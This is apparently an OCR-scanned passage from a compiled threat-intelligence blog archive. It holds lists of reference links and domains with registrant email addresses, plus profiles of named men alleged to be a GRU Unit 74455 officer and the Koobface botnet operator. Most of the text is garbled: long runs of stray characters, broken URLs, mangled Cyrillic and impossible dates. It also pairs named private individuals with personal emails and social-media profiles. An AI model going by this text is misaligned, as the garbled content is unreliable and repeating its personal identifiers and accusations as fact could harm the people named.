1, https: //blogger. googleuser content. con/ing/b/RO0v22:a /AVwXsEhopind6ZEl InBRtxBGezyGPHia7A_ PuBCBKs vai St2g 
"http: //ddanchev. blogspot con/2028/08/the-vop-managenentof- cont i-ransouvare. hal 
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. https: //ddanchev.blogspot .com/2023/09/new- images-courtesy-of-conti-ransomware.htm 
. https: //ddanchev.blogspot .com/2023/09/dancho-danchevs-rewards-for-justice.htm 
. https: //archive.org/details/rewards-for-justice-01 


https: //ddanchev. blogspot. com/2023/10/my-first-twitter-space-on-how-i-tracked.htm 
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domains: 

affina-groupsvc .cc - Email: justin dickerson@ymail.com 
altgroupco .cn - Email: abuseemaildhcp@gmail.com 
alt-groupco .net - Email: MarcusStraker909@gmail.com 
annuity-groupnet .cc - Email: justin dickerson@ymail.com 
archway-groupinc .cn - Email: abuseemaildhcp@gmail.com 
armor-groupco .cc - Email: defrankpo@gmail.com 
ava-group .cc - Email: Gregory.Michell2009@yahoo.com 
ava-group .cn - Email: Gregory.Michell2009@yahoo.com 
ava-groupsvc .cc - Email: Gregory.Michell2009@yahoo.com 
avagroupsvc .cn - Email: Gregory.Michell2009@yahoo.com 
bfs-groupinc .cc - Email: defrankpo@gmail.com 
braingroupmain .cn - Email: abuseemaildhcp@gmail.com 
brain-groupsvc .cn - Email: abuseemaildhcp@gmail.com 
ccn-groupco .cn - Email: Gregory.Michell2009@yahoo.com 
cdi-groupmain .cn - Email: garry honn@yahoo.com 
cosco-groupmain .cn - Email: andrew _cc@yahoo.com 
criscom-group .cc - Email: Gregory.Michell2009@yahoo.com 
criscomgroupco .cn - Email: Gregory.Michell2009@yahoo.com 
criscom-groupinc .cc - Email: Gregory.Michell2009@yahoo.com 
cronos-group .net - Email: MarcusStraker909@gmail.com 
cronos-groupinc .cn - Email: abuseemaildhcp@gmail.com 
cronos-groupinc .com - Email: bias@co5.ru 

cronosgroupsvc .cn - Email: abuseemaildhcp@gmail.com 
dove-groupli .cn - Email: abuseemaildhcp@gmail.com 
entrustgroup .cn - Email: moldavimo@safe-mail.net 
extreme-groupinc .cn - Email: abuseemaildhcp@gmail.com 
fairline-group .cn - Email: Gregory.Michell2009@yahoo.com 
flatgroupfly .cc - Email: steven lucas 2000@yahoo.com 
full-controll .cc - Email: morgan.greg@yahoo.com 


2854 


11. 

12. 
13. 
14. 


ttps://ddanchev.blogspot .com/2022/06/a-compilation-of-conti-ransomware- gang. htm 


ttps://ddanchev.blogspot .com/2022/06/a-compilation-of-known-conti-ransomware_4.htm 
ttps://ddanchev. blogspot .com/2022/06/a-compilation-of-known-conti-ransomware.htm 


18. https: //ddanchev.blogspot .com/2023/04/exposing-fashion-brands-of-conti.htm 
19. https: //ddanchev.blogspot . com/2022/03/exposing-trickbot-malware-gang-osint .htm 


ttps://ddanchev. blogspot .com/2022/02/exposing- conti-ransomware-gang-osint_28.htm 


ttps://ddanchev. blogspot .com/2022/06/a-compilation-of-known-conti-ransomware_21.htm 


22, 

23, 

24, 

25 


QpEiJOMtGPI_oNZzw1igZGQj046_UNIKuZw/7WWH2krElu-DTqgtpohfL 
26. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEiJD2bRJZ1cF0gRE11_NP4PgwBU_XiE0QjknDdZiiWVsHz 
£3zZYhlgaiNSXq3YD80Rt 7puQtU3_MJh3ulakwAtk2hF_UPLbPjdf5m 


27. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEg8G4udB3HWUib7T7WF 1H2cTaNP1FiaBbn3u1U5GD£3DX8 
Z8ehM9 JhD8tKb1inW8WuTt OwFiEA6-LDgOipah_kkd1Yo9LJXeKoruD76 
28. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEgjZTWEK6ixa4B91H6gZCv_SAR17xYSapjU1-ZIIZOiWxo 


i} 
fon) 
nt 
2 


u1KB jOb9gEBEfhRIx7iIDX3qPTGcuoyLjGSCWPrf5bM56fUzxXv- 
9. 


N 


ct 
(ag 
uc) 
n 
| Pad 
"aS 
oO 
# 
° 
9g 
09 
0) 
RK 
09 
° 
° 
09 
H 
oO 
Sc 
“1 n 
; | ® 
re 
2) 
° 
“iB 
a | ag 
0) 
B 
ct 
a 
fe} 
B 
~ 
H. 
8 
09 
S 
jon 
S 
=e) 
N 
Se) 
<q 
N 
roN 
fa 
H 
~ 
> 
< 
<q 
fal 
n 
i] 
BH. 
tal 
09 
[o) 
Q 
< 
{>) 
uc) 
N 
aS 
D 
U 
j=) 
<= 
tS 
(=) 
B 
= 
D 
° 
Q 
fo) 
j=) 
(s) 
a 
=] 
i=) 
< 
B 
QD 
pb 
B 
(ee) 
a) 
fe) 
yr 
foe) 
N 
wn 
Ke) 
09 
n 
N 
» 


rw) 
I 
‘Uv 
Q 
iS) 
us 
re) 
Q 
j=) 
< 
=") 
a 
H 
N 
N 
<= 
oO 
i 
ct 
w 
S 
i 
NJ 
ce 
c 
Q 
fe 
mw 
ua 
u 
~ 
Fh 
w 
au 
u 
<q 
jo) 
=] 
SG 
Q 
ba 
Q 
qq 
2 
eH 
n 
oO 
09 
fe) 
° 
ao 
B 
a 
H 
N 


ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEi-t8eLyWvzasdczb-4C jZSDKX9wDb3W11V0b2gXrbJA7_ 


Ww 
= 


OO 
wn 
ct 
=a 
n 
oO 
< 
09 
© 
it 
‘Ug 
Hy 
H 
No} 
Qa 
B 
= 
Kh 
es 
es 
ps) 
gq 
Q 
pe 
Qa 
B 
o>) 
ir] 
ps 
B 
=z 
4 
iS 
< 
< 
=a 
Ww 
Ww 
Q 
is] 
= 
oe) 
B 
fle} 
Fh 
“NI 
is) 
N 
H 
09, 
=a 
c 
tar 


WwW 
H 
ct 
ct 
ue] 
n 
ie 
=s 
ion 
H 
fe) 
0Q 
0Q 
() 
R 
09 
fo) 
fe} 
(he) 
H 
(0) 
(= 
n 
(0) 
5 
fa) 
° 
=] 
ct 
(0) 
=] 
ct 
a 
° 
B 
Ss 
b 
B 
oq 
~S 
lon 
~ 
ie 
N 
oO 
< 
N 
N 
tal 
H 
~ 
Pd 
< 
<g 
al 
n 
ina 
= 
Ww 
N 
Rd, 
N 
° 
+O 
N 
() 
fH 
H 
oe) 
= 
w 
<= 
Ss 
N 
qq 
B 
Q 
Ww 
N 
oO 
g 
(he 
pad 
=m 
N 
B, 
eS 
pas) 
ina 
aS 
=] 
(os) 
fo} 
ps) 
© 
< 
n 
N 
) 


mnkbal7yErC3ys041KsLAOFT6CZuri5u8Rt6rAPcDNcVv0iCsurL_36 
2 


WwW 


Xe) 
Hh 
al 
w 
B 
w 
i) 
S 
HA 
< 
w 
pan 
ss 
yr 
ie) 
No |e 
an 
wo 
=) 
ia] 
ol 
[ay 
Q. 
> 
Q 
n 
es 
is 
a. 
oO 
ct 
HB. 
o 
my): 
tal 
< 
~ 
ot 
fo) 5 
w 
tal 
<4 
Nj 
Ny 
Hh 
ue) 
4 
w 
B 


ct 
ct 
uc] 
n 
~ 
fas 
ion 
H 
fe} 
0Q 
09 
(0) 
5 
09 
fo) 
fe} 
(he) 
H 
(0) 
i= 
n 
(0) 
4 
fa) 
° 
(=! 
ct 
(?) 
Bb 
ct 
fa) 
° 
B 
~ 
H 
B 
(te) 
~S 
ion 
aS 
De 
N 
oO 
<q 
N 
NO 
tal 
H 
~ 
Pad 
< 
<g 
asl 
n 
ina 
qw. 
tal 
wn 
© 
tf 
N 
@ 
n 
carl 
= 
Hy 
(oe) 
KS 
fas] 
= 
< 
x 
=a 
N 
tH 
a 
=} 
“NI 
wn 
w 
B 
< 
8 
uel 
a 
an 
ha 
iw] 
H 
qq 
y 
bp 
> 
wo 
B 


WwW 
Ww 
co 
ct 
ue] 
a 
~N 
SN 
ion 
H 
° 
09 
0Q 
lo) 
R 
09 
° 
° 
(ie) 
Hb 
© 
fe 
a 
to) 
4 
fa) 
° 
(=) 
ct 
0) 
=] 
ct 
fa) 
° 
B 
N 
H 
=} 
(ie 
N 
lon 
N 
Ps) 
iS) 
o 
< 
N 
iS) 
tal 
H 
N 
> 
= 
< 
al 
a 
sz 
= 
uv 
B, 
co) 
Ay 
=) 
0 
[?) 
5 
(an 
os 
ion 
a 
5 
H 
° 
4 
oa 
= 
=] 
a 
oO 
= 
Ps 
(oe 
oq 
Q 
Q 
00 
Q 
H 
g 
Oo 
fag 
N 
rr 
w 
re) 
Fh 
> 
© 


Z6aHtah7BFCOyfE1MkYs49umHPBGDTv4a7-KO7HIkXMayn_wAf8I0q 


WwW 
ms 
ct 
ct 
uel 
a 
~ 
~ 
a 
H 
fe} 
09 
09 
(0) 
5 
09 
° 
fe} 
(i) 
H 
() 
c 
n 
(0) 
8 
fa) 
ie} 
B 
ct 
(0?) 
B 
ct 
fa) 
ie} 
B 
~ 
H 
B 
0a 
~ 
a 
~ 
wD 
iS) 
xe) 
<g 
N 
i) 
fa] 
H 
~ 
Pad 
< 
<q 
fal 
n 
ie2) 
a 
Q 
Fh 
Hy 
fou 
xe) 
< 
‘U 
wn 
as) 
xe) 
NJ 
w 
H 
H 
NS 
Kh 
ca | 
N 
ps 
a) 
Hi 
< 
(ye) 
fe) 
w 
ay 
Hh 
o>) 
ps 


Ni 
° 
i=) 

(ic) 

= 
a 
«3 
9 
o 
'uU 
fo 
ra) 


te) 
[o>) 
n 
‘U 
ol 
ian] 
is] 
(o>) 
yc) 
te} 
Eat 
(o>) 
oO 
iw] 
w 
@ 
al 
H 
gq 
mS 
N 
Kh 
w 
= 
= 
N 
NO 
Ww 
< 
ol 
oO 
wm 
NI 
= 
Qa 
iS 
n 
yy 
3 
ue] 
(=) 
Ni 
Ww 
oO 
fare 
(o>) 
o 
uo) 
© 
a 
00 


WwW 
ul 


ttps://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVvXsEhjUsR3ZF_Vt803U0 JKD5k6n-KRo9t jkaCt4-RyHeGkd9 
1RGOFscZ055MR7SUG4V018N JroN7Eafa0BLf£Q-9Mz0TiuoC9Jgyqrcp 


36. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhWISUdUBDQkmnrcGkS0i IvkRd1Z1FVeHUU- oE6iUxzFIb 
xESt_3egR-zK3G8Sn6tcS__hOXFkpf6wdiVD1Kzj YOFENQG2xVmilZx 

37. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhkeaHz5E01hZDNK6RzQr2E-LyUZfmzx3y JFyhLBeaQKI 
xE_5Tt_AIQhT-DW294uD99TiAF1Kv1-F539aMU-m_WDBekJireF40mGc 

38. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVvXsEjoSe9-LSy5iWIQoRraKMiuHkK Jm8vyN4FOTiNYErgL4sY 

r Jp9e6zIEUqGC- Aa915c5q0UXe8wbSjz41uFmVQ1eKewcbVef70LQ9D- 

39. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEiVs9XalWehVTLLjn7R8£ o03WuBtz3N6NQq78aMf vFIf-¢ 
z4wBHbAqOwP JG7c5d00cOU_3K3nCnMmF JhMvz3Xq_BZLW50bJ Jnk2bL 

40 ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEiUkN2_DQTdmybCDSTGy6bHS9tulo9boP7woS-ofejmnh- 


5 
Bq 
Pe 
S) 
n 
a 
a 
0) 
a) 
ake 
| 
H 
ion 
sa 
yj 
a 
= 
ol. 
8 
Ee 
eI 
ct 
x 
x, 
© 
N 
a 
a 
Q 
° 
vu 
IN) 
te 
aD 
ws 
KS 
co 
Q 
on 
09 
is 
To) 
ima 
N 
Parl 
B 
col 
fe 
5 
ue) 
A 


ct 
ct 
uc] 
n 
~ 
~ 
ion 
# 
fe) 
0Q 
09 
(0) 
5 
09 
fo) 
fe} 
(he) 
H 
(?) 
i= 
n 
(0) 
8 
fa) 
° 
(=| 
ct 
(0?) 
=] 
ct 
fa) 
° 
B 
~ 
bE 
B 
oq 
pa 
lon 
~ 
Pel 
N 
oo 
i] 
N 
NO 
tal 
H 
So 
Pa 
< 
<g 
asl 
n 
az 
pb 
ct 
x 
G2 
Co} 
tat 
nS 
QQ 
qQ 
is] 
G 
5 
oO 
° 
Q 
be 
n 
Q 
ws 
ay 
“I 
+Q 
oO 
= 
Db 
Qa 
o 
Ie 
bat 
(o>) 
Hh 
(o>) 
iw] 
H 
Q 
B. 
an 
w 
ry 
iw] 
(0) 
ro! 


1. 


sNvMjDMqc4PyvpDQWK7qadRoPexhgyBr9h890wueNwH1-sm_1eM2j1 
42. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhpAD29-K_hyphenhyphentL56ciTFgBZiZafNqfu4u08E 
V9_4gN-Q5USqe3833sGFGHKQ£kPmv71En1irYFMz-s15BgMZO0b9XV72Z 


28513 


Ww 


ttps://blogger . googleusercontent .com/img/b/R29VZ2x1/AVvXsEjwFnhPpy2XhpAH9bj LwbCsOZbxucSrwtsso0T9C4ZhAe 


sxuT3c-Uvg0sDTe0GPgxJxbvMmpkc8xD jXZu6DockjZBORq1vHxcnxa 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhETWCHEpdX9H5qwWQ j prL9UVLwomyKakYnHaT jnqNKJN. 
yHRmuZn8DIcjUGm61kdfNYyhShQmBHruYbROGBHhJchWxVih1j1FqkUH 


ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEiRpqMBXIBhZOs5cbuKhucV7Cdy6WKd6nib8eyA0XbjbiE 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhaC1cC- vMT7QmI01YsLcf9Fp4ezoo0 JmymkAfGLFb4c7- 


cvTmErvr68gHrzv8E5v/7GIc7qMOM1VrpfFeiwJCp5QLnROc- 3£04D0R 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhv7tEf 7 YVfp7yazkAORsCjHX8uiofmt-t31CvTZE9 jpT 
ROcvtpmbGGZUEbxE_FNA_o0zjAs2DprBnQ70xZqNwA_Dh30X6 


ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgAk4G2anmg IuSrCD8BpL8DFA4R4nEENXC J2MX j wnAo1WC 


Uf2wsjAxlmlrVr6gy8NiLf-1tsdFRa_wqjpE2MxhJDEsHsM17_HQck 


> 


= 2 . P~ =} - 
Oye; D Iog | 
N av 
o ez] 
eH a 
' ~ 
tal 
(ov) 
< 
N 
0a 
o 
0a 
w 
N 
~ 
=a 
bal 
oe) 
oO 
PS) 
foe) 
w 
Bs) 
fo) 
Q 
oO 
a 
(an 
[o>) 
R 
= 
© 
us 
B 
Q 
w 
es 
iw] 
2 
‘o 
Qa 
<q 
<= 
09 
ua. 
i= 
in” 
ua. 
= 
Ww 
B 
Q 
Hh 


1h TS 
Xe} 
ct 
ct 
uel 
a 
~ 
SS 
a 
Bp 
fe) 
9a 
09 
0) 
A 
09 
[e} 
ie} 
09 
H 
() 
c 
a 
(0) 
R 
fa) 
ie} 
B 
ct 
0) 
B 
ct 
fa) 
° 
B 
ee 
be 
B 
(i) 
S 
a 
S 
De 
NO 
Ke) 
<q 
N 
i) 
ps 
H 
™~ 
> 
< 
<q 
fal 
n 
isa) 
09 
Ke) 
N 
B 
ws 
<q 
ar 
B 
jo) 
ra 
[53 
< 
=a 
i) 
= 
H 
c 
i) 
a 
ct 
N 
H 
gq 
tal 
09 
foe) 
AJ 
(rz) 
p=) 
is] 
< 
09 
w 
wa 
o>) 
a) 
0) 
N 
< 
1) 


Ckts4MKg3VozmF OkLfXDSbo0albrF J6kImueRmdZtQtr918VyJMInd 
ttps://blogger . googleusercontent.com/img/b/R29VZ2x1/AVvXsEhdRKEQhoDCYZb1 vhz2M90xKHZws1R71AJJifclpJP-t9 


sxI5FJ_XKLFKYYE4jQtVnvjEb784tTtGuwj o68Dyn8M9RWCRzzDt2hm 


51. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEiEi je8e08-DTU1LDR219rYObWimz5Mo_V-Oe8dtcG7_eXg 


ul 
| 


> 
oO 
wn 
< 
ra 
a 
N 
i= 
0Q 
aS 
oO 
oO 
Q 
~N 
w 
=! 
< 
Ww 
S< 
< 
4 
ct 
Pad 
G 
iw] 
is 
oO 
ar 
Pad 
Q 
re 
< 
+Q 
N 
= 
wn 
=a 
09 
ct 
Q 
re 
ct 
Dn 
[on 
N 
NO 
Hh 
H 
a) 
H 
© 
= 
ta 


ul 
N 


ttps://blogger. googleusercontent.com/img/b/R29VZ2x1/AVVvXsEh3V1IxtAsO6L7ROOchgRSHMXDyvmkZ yho4k jagwuGm4 


fa) 
oO 
Co. . 
rer 
i=] 
0g 
<g 
oO 
ct 
w 
fo) 
@ 
nw 
a 
> 
0a 
n 
n 
a 
ol 
oO 
=] 
cal 
() 
w 
a 
< 
© 
an 
tal 
fan 
o 
SNS 
{ie} 
| 
i= 
iy 
K 
w 
as) 
=] 
= 
NO 
be 
N 
tol 
a 
Q 
Pr 
H 
tal 
n 
n 
ww 
<g 
N 


ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEi_tk5-Ne57sHVOJB- XAnuKb6TFi6zNwaC8B4dXa8Srrp 
FNFQU- 
ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEhoFnIdLCRuikRTspBNI9L- gQMwVf226Pq7n2fHGvkWdN 


ul 
Sa 


+Q 
ct 
0) 
= 
N 
B 
fo) 
ps 
Ni 
fH 
N 
Kh 
ao 
‘Uv 
Et} 
=4 
ct 
0) 
< 
iS) 
“NI 
N 
p=) 
ct 
Q 
ct 
rr 
= 
= 
yy 
Bb 
p=) 
a 
=] 
N 
Q 
Y 
uc] 
n 
y 
S 
= 
0Q 
fee) 


u 
> 


es) 
ro] 
N 
i=) 
fH 
ASS 
CS 
ao 
yr 
ie) 
ie) 
09 
N 
c 
wn 
oO 
| 
= 
wn 
j=) 
a) 
G 
< 
=") 
ao 
N 
H 
=z 
=~ 
w 
: 
4 
B 
yy 
ua 
o 
rv) 
H 
= 
re) 
a 
oO 
n 
2 
Gl 
(=) 
+Q 
ct 
re) 
p=) 
Fh 


ttps://blogger. googleusercontent.com/img/b/R29VvZ2x1/AVvXsEhXqt vo0S644054Y J- EdE6Y6c JC2u9sE04XxLVz72k2c0 
u-guRUm- 


ul 
- 


S< 
(0) 
S< 
< 
=] 
Fh 
nz) 
fo) 
a 
H 
4 
oO 
q 
= 
4 
@ 
Pad 
> 
o 
Be 
iw] 
ica 
qQ 
es] 
(0) 
qQ 
H 
be 
S 
tal 
= 
uel 
o>) 
w 
i= 
=) 
a 
Pa 
N 
Qa 
Ay 
oO 
r 
N 


ul 
[o)) 
ct 
ct 
ue] 
n 
~N 
N 
ion 
B 
° 
(ee) 
09 
© 
R 
0a 
° 
° 
0a 
H 
© 
is 
n 
a) 
R 
a 
° 
5 
ct 
to) 
B 
ct 
a 
fe) 
B 
N 
E 
B 
oa 
N 
jon 
N 
w 
ie} 
oO 
< 
N 
No 
bd 
H 
N 
> 
= 
< 
> 
n 
isa) 
(je) 
K 
N 
ae) 
° 
nN 
H 
eet 
NJ 
ha 
00 
is) 
ue] 
> 
is) 
rs 
° 
0a 
oO 
H 
a 
-) 
N 
q 
ct 
Oo 
= 
=) 
b4 
a 
Es) 
pH 
“ 
is) 
=a 
5 
a. 
qa 
Ee) 
= 
N 
Hh 


Ept13D9yzq9n0GKntduai1SHBrwOT7hqNhi_Q1LIGYT75cscQ33-bU 


ul 
N 
ct 
ct 
uel 
a 
~ 
~ 
o 
H 
fe} 
09 
09 
(0) 
5 
09 
° 
fe} 
(i) 
H 
() 
c 
a 
(0) 
fa) 
ie} 
B 
ct 
() 
B 
ct 
fa) 
° 
B 
™~ 
be 
B 
a 
~ 
o 
~S 
w 
NO 
Ke) 
<g 
N 
iS) 
fa 
H 
~ 
Pa 
< 
<g 
fal 
n 
isa) 
09 
[=] 
a 
col 
N 
H 
4 
dp 
5 
~@ 
a. 
“Ni 
fe) 
ao) 
a 
fe) 
a 
p@ 
a 
i) 
a 
(oe) 
fo) 
Q 
wv 
ue] 
nS 
Qa 
io” 
Ke) 
B 
iS) 
OD 
N 
= 
09 
eo. 
Q 
iS 
be 
@ 
0a 
Fad 
a) 


Rf VrOBoBg62HX1q1VU3VptMsmXYBXD6TVkx_WBgvtizIVfxwPzwYy 


ul 
© 
ct 
ct 
‘oO 
n 
~ 
Ss 
o 
H 
fe) 
(ue) 
(ye) 
(0) 
Ri 
0a 
° 
fe) 
09 
ma 
(0) 
c 
n 
(0) 
8 
fa) 
eo} 
B 
ct 
(?) 
B 
ct 
Qa 
° 
5B 
™~ 
b 
=I 
(ec) 
~ 
oO 
~S 
Pe) 
N 
No} 
< 
N 
N 
p4 
an 
~ 
Pad 
< 
<g 
fal 
n 
ica] 
(ah 
N 
a] 
Fh 
() 
e 
bo 
ir] 
os) 
= 
at 
w 
oe) 
ae 
yr 
Q 
(a 
[o} 
dp) 
b 
qa 
Ps 
| 
o 
© 
o 
wa 
cj 
o 
o 
Sa 
is] 
Q 
0a 
w 
w 
foe) 
wn 
= 
o 
ct 
eho) 


Q 
Kh 
< 
0a 
oO 
N 
a 
Q 
A 
tal 
0a 
i) 
oO 
ro) 
= 
ua. 
=] 
5 
ud 
mr 
= 
iS 
= 
n 
G 
B 
ina) 
jw. 
oa 
K 
oe) 
ez) 
Ee) 
a 
to 
nS 
iow 
Q 
H 
wn 
x 
Q 
> 
= 
yr 
oO 
fo) 
Ww 
oO 
ct 


ul 
oO 
ct 
ct 
ue] 
a 
~ 
S 
o 
# 
fe) 
09 
09 
0) 
5 
09 
ie} 
fe) 
(i) 
H 
(0) 
c 
na 
oO 
8 
fa) 
° 
B 
ct 
0) 
B 
ct 
fa) 
fe} 
B 
~ 
be 
B 
oa 
SY 
o 
S 
==) 
NO 
xe) 
<q 
N 
iS) 
fa 
H 
~ 
> 
< 
<q 
fal 
E 
p 
a 
° 
co | 
KB 
o>) 
5 
(0) 
qa 
fa 
col 
c 
a 
fo) 
ul 
Ps) 
H 
a 
+Q 
iw] 
+Q 
B 
K 
» 
n 
N 
Pe) 
i) 
> 
Qa 
p 
<q 
Ee 
oO 
N 
5 
w 
H 
w 
qa 
Ss 
= 
(0) 


UVCipugHbpCNaVKC7 quVnh9cZTBdqgLhOJe-y4WkXBBjf£1Qq32knk1 

ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgFLmgertICxwrlJajxZjZPZ11_KcBJ62TR3XI1YlaFjk! 
G7KkdsXsBDrV2wpIQ2x4Xn-m6_OmQnSmSrpM93HcDkJTp1SqZhJLkS _ 

ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEikirF61_h4wmP51LIfUL3B5y1£YrBOEUEAP3B-ZeDFeJ 
cWzif99ft_1_iRFEy-T4RpZDBOeOr_HuCTLEUDhyTb06_L1E30iz9r 

ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEi614dw70_D86tTYBT_S_G1dJO-h61PO0FekIzdxw3UD4D 


{e)) DIF|ADIRIO 
WN BR Oo 
Be 
o 
R 
< 
= 
ies] 
B 
“N 
is) 
<7 
a 
(0) 
oO 
be 
a) 
oO 
ps) 
n 
09 
=F 
ad 
re 
ct 
© 
(a) 
Ss 
Re 
<g 
w 
(i) 
= 
Kh 
i=) 
as) 
ae) 
aa 
iow 
Sg 
R 
oO 
is) 
m 
~@ 
Kh 
a 
n 
o 
e 
=a 
IN 


ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgQxs5BROY 2UgHnqnF gj DxKk9XXWrv2Ud-fdBFuglrcTZ 
H-NeqMYZFaJwcWskoDTS62SqHACKuQq0k8390Tx1g9Qvg3v800G8tr 


U- 


(o>) 
nS 
ct 
ct 
“ol 
a 
“ 
N 
ion 
H 
fe} 
(¢] 
09 
0) 
5 
09 
° 
fe) 
09 
H 
0) 
c 
a 
0) 
5 
fa) 
° 
B 
ct 
0) 
B 
ct 
fa) 
° 
B 
~N 
Ee 
B 
0a 
N\ 
lon 
N 
Pe) 
N 
oO 
< 
N 
N 
ps 
H 
~N 
> 
< 
< 
fal 
n 
ina) 
ua. 
5 
ps 
p: 
Kh 
fo>) 
B 
Qa 
© 
Qa 
O) 
° 
Ny 
5 
BS 
a 
ion 
5 
<4 
AH 
N 
So 
H 
io] 
] 
=} 
iS 
“Ni 
= 
=a 
n 
qQ 
ay 
< 
= 
oe) 
N 
So 
Ww 
G 
pr: 


nY sTI0TVQdRMGQXs81LkyWevk-HO028 jnkPYqoISGvKo49KfW39WPEq64 


(o>) 
Ul 
ct 
ct 
uc] 
n 
~ 
~ 
ion 
H 
fe) 
9Q 
oq 
(0) 
09 
fo) 
fe) 
{he} 
fy 
(0) 
c 
n 
(0) 
fa) 
fo} 
B 
ct 
(0) 
B 
ct 
fa) 
fe) 
B 
~ 
bE 
B 
(te) 
~ 
lon 
~ 
Pe] 
N 
oO 
< 
N 
N 
ps4 
an 
~ 
Pad 
< 
<g 
tal 
E 
i 
uc] 
B 
fo) 
ps 
Q 
N 
B 
(0) 
S< 
fe) 
ir] 
H 
n 
ina 
iS 
re 
(0) 
4 
<4 
=a 
N 
ion 
Fh 
=a 
wa 
fo} 
ct 
ion 
< 
=o 
ps 
n 
b 
S< 
oO 
Ct 
N 
iS 
io) 


K_8QTb£XzUnsKjtWkPGTBCk12tg37qkbhcLGDR5OtN6JcOuagrj7JY50 
ttps://blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEgh9dFXX j ] E8BRUNdcQs-ScebrvZH1FXrIGsuND4YAvFOD 


fo) 
ao : 
q 
z 
ct 
SS 
Fh 
o 
Fh 
Pal 
N 
a 
iS) 
4 
=] 
Ay 
B 
© 
ro) 
H 
: 
SS 
9 
iS) 
S 
n 
o 
N 
isa 
[= 
va 
tan 
o 
i) 
a 
A 
° 
R 
\=5 
0 
A 
N 
9 
g 
3 
my 
Q 
o 
x 


ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhbkvvpvQ8x4AHVVUIn6daCZS_EScpnTt8yrWuxj0jrbAi 


rd 
= 
=) 
n 
na 
0) 
oo) 
© 
m 
Hh 
Ee 
in) 
5 
Me) 
& 
S) 
= 
2 
Go 
ion 
BD 
SI 
R 
R 
= 
> 
a 
° 
a 
q 
oo 
Fh 
00 
jw. 
0 
I 
oo 
i 
=) 
N 
rt 


fo) 
ici 


! 
mw 
+Q 
= 
'U 
Fa] 
2 
4 
ct 
on 
N 


28514 


kH4TKFEKJ1Wk9Rw1kHUr j 2401GUzzOHyxCHNtULLLXtC9cY18g0mXR9 
69. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEhyHNtafeg5 jrd3t8xNUHzaPTv3gkAsstrdwOLUwewnlK9 


OuGfCqWRSU- 8KdHZHMUHuR- gTdU6VxRw-WBus3ekShmjthRxNkgqEYrd 
70. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEiifWul-yj811j j2nDzA- 2bPW4- gqI09af c2yvaD5dqX5P 
1. 


72. https: //intel471.com/blog/top-bulletproof-hosting-providers-yalishanda-ccweb-brazzzers- 2021 
73. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVvXsEimLTXSAEbo10RjDuJc7 J3HqLHQcTYihiAsigxDzn2RwS 


1Tktemwt- XqD2m1HUiU31Sobt7pxwyfn_Ah7wNcluLEW9m0QQbO0PxcQ 


68. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEigz_KwtxtxMENDJp8ix-uppJzX3ak301kbs4wrHEJdrFb 


20.1.2 Profiling Anatoliy Sergeyevich Kovalev from GRU’s Unit 74455 "NotPetya" 
Malware Gang (2024-01-07 01:37) 


8 Esrexuit ODegopos 
Peituur: -52 VKR 
[1] avit Crpanmua: id702871912 


including my research [3]here. 


An image is worth a thousand words. And so is a [2]link 


Related links: 


hxxp://vk.com/id207493137 
hxxp://vk.com/id221867060 
hxxp://vk.com/id702871912 


[4] 
28515 


[5] 


28516 


[6] 


CTpaHa NpooKuBaHna: Poccua 

Topog: Cy3emka 

Bpicwee o6pasoBaHne: 

By3: BIy um. Netposckoro , 1989 

@akyNbTeT: OvsvkO-MaTemMaTMY4eCKM MakyNbTeT (ECTECTBEHHO-Hay4HbIi MHCTUTYT) 
Cpeguee o6pa3oBanne: 

Lukona: Wkona N2 2 , 1984 Cy3emka 

Tekyljan QeATenbHOCT: BIY um. NeTposcKoro 
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geniouspartner .cn - Email: morgan.greg@yahoo.com 
holding-group .cn - Email: ronny.greg@yahoo.com 
igt-groupco .cn - Email: abuseemaildhcp@gmail.com 
igtgroupinc .cn - Email: abuseemaildhcp@gmail.com 
igt-groupinc .com - Email: feet@freemailbox.ru 
index-groupinc .cn - Email: abuseemaildhcp@gmail.com 
index-groupinc .com - Email: taffy@blogbuddy.ru 
indexgroupinc .net - Email: MarcusStraker909@gmail.com 
index-groupmain .cn - Email: abuseemaildhco@gmail.com 
ing-groupsvc .cn - Email: admin@emerge-groupnet.cn 
integrity-groupinc .cc - Email: justin _dickerson@ymail.com 
invalda-groupli .cn - Email: rocco _invalda@yahoo.com 
invalda-groupmain .cn - Email: rocco _invalda@yahoo.com 
invalda-groupmain .com - Email: chum@cheapmail.ru 
landgroupinc .cn - Email: abuseemaildhcp@gmail.com 
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20.1.3. Where Is Anton Nikolaevich Korotchenko (AHToH Hukonaesuy KopoTueHko) 
Also Known as Koobface Botnet Master KrotReal? - Part Three 
(2024-01-07 10:05) 


[1] 


An image is worth a thousand words. And so is a [2]link and my analysis on the Koobface 
botnet [3]here. 
